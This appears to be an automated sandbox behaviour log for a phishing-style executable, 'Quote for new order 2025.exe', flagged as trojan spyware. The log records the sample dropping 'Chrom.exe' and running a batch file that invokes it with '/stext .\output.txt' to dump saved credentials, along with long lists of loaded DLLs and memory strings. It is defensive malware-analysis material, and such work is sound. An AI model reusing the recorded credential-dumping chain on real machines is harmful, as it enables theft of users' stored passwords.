Source: Quote for new order 2025.exe, 0000000B.00000002.3529863966.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs Quote for new order 2025.exe
Source: Quote for new order 2025.exe | Binary or memory string: OriginalFilenameFoxmaiI.exe4 vs Quote for new order 2025.exe
Source: classification engine | Classification label: mal84.troj.spyw.winEXE@21/9@1/1
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_0041A225 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_0041A6AF GetDiskFreeSpaceW,GetDiskFreeSpaceA,free
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_00415799 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_00416A46 FindResourceW,SizeofResource,LoadResource,LockResource
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | File created: C:\Users\user\Desktop\Chrom.exe
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1436:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
Source: C:\Users\user\Desktop\Chrom.exe | File created: C:\Users\user\AppData\Local\Temp\bhvF18F.tmp
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "
Source: Quote for new order 2025.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Quote for new order 2025.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.69%
Source: C:\Users\user\Desktop\Chrom.exe | System information queried: HandleInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Quote for new order 2025.exe, 00000000.00000000.1658990510.0000000000E92000.00000002.00000001.01000000.00000003.sdmp, Chrom.exe, Chrom.exe, 00000004.00000000.1676249370.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000002.1819130753.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000000.1800979457.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000000.1883289782.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000002.1901575324.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe.0.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: Quote for new order 2025.exe, 00000000.00000000.1658990510.0000000000E92000.00000002.00000001.01000000.00000003.sdmp, Chrom.exe, Chrom.exe, 00000004.00000000.1676249370.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000002.1819130753.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000000.1800979457.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000000.1883289782.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000002.1901575324.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe.0.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Quote for new order 2025.exe, 00000000.00000000.1658990510.0000000000E92000.00000002.00000001.01000000.00000003.sdmp, Chrom.exe, 00000004.00000000.1676249370.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000002.1819130753.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000000.1800979457.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000000.1883289782.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000002.1901575324.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe.0.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: Quote for new order 2025.exe, 00000000.00000000.1658990510.0000000000E92000.00000002.00000001.01000000.00000003.sdmp, Chrom.exe, Chrom.exe, 00000004.00000000.1676249370.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000002.1819130753.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000000.1800979457.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000000.1883289782.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000002.1901575324.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe.0.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: Quote for new order 2025.exe, 00000000.00000000.1658990510.0000000000E92000.00000002.00000001.01000000.00000003.sdmp, Chrom.exe, Chrom.exe, 00000004.00000000.1676249370.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000002.1819130753.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000000.1800979457.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000000.1883289782.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000002.1901575324.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe.0.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: Quote for new order 2025.exe, 00000000.00000000.1658990510.0000000000E92000.00000002.00000001.01000000.00000003.sdmp, Chrom.exe, Chrom.exe, 00000004.00000000.1676249370.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000002.1819130753.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000000.1800979457.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000000.1883289782.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000002.1901575324.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe.0.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: Chrom.exe, 00000004.00000002.1694040935.0000000000870000.00000004.00000020.00020000.00000000.sdmp, Chrom.exe, 00000008.00000002.1819592441.00000000027D4000.00000004.00000020.00020000.00000000.sdmp, Chrom.exe, 0000000E.00000002.1902157447.0000000002733000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: Quote for new order 2025.exe, 00000000.00000000.1658990510.0000000000E92000.00000002.00000001.01000000.00000003.sdmp, Chrom.exe, Chrom.exe, 00000004.00000000.1676249370.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000002.1819130753.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000000.1800979457.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000000.1883289782.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000002.1901575324.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe.0.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                          Source: Quote for new order 2025.exeReversingLabs: Detection: 60%
Source: unknown | Process created: C:\Users\user\Desktop\Quote for new order 2025.exe "C:\Users\user\Desktop\Quote for new order 2025.exe"
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\Desktop\Chrom.exe .\Chrom.exe /stext .\output.txt
Source: unknown | Process created: C:\Users\user\Desktop\Quote for new order 2025.exe "C:\Users\user\Desktop\Quote for new order 2025.exe"
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\Desktop\Chrom.exe .\Chrom.exe /stext .\output.txt
Source: unknown | Process created: C:\Users\user\Desktop\Quote for new order 2025.exe "C:\Users\user\Desktop\Quote for new order 2025.exe"
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\Desktop\Chrom.exe .\Chrom.exe /stext .\output.txt
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\Desktop\Chrom.exe .\Chrom.exe /stext .\output.txt
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\Desktop\Chrom.exe .\Chrom.exe /stext .\output.txt
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\Desktop\Chrom.exe .\Chrom.exe /stext .\output.txt
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: msftedit.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: windows.globalization.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: bcp47mrm.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: globinputhost.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: dataexchange.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: d3d11.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: dcomp.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: dxgi.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: twinapi.appcore.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: pstorec.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: msftedit.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: windows.globalization.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: bcp47mrm.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: globinputhost.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: dataexchange.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: d3d11.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: dcomp.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: dxgi.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: twinapi.appcore.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: pstorec.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Chrom.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: msftedit.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: windows.globalization.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: bcp47mrm.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: globinputhost.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: dataexchange.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: d3d11.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: dcomp.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: dxgi.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: twinapi.appcore.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Section loaded: coreuicomponents.dll
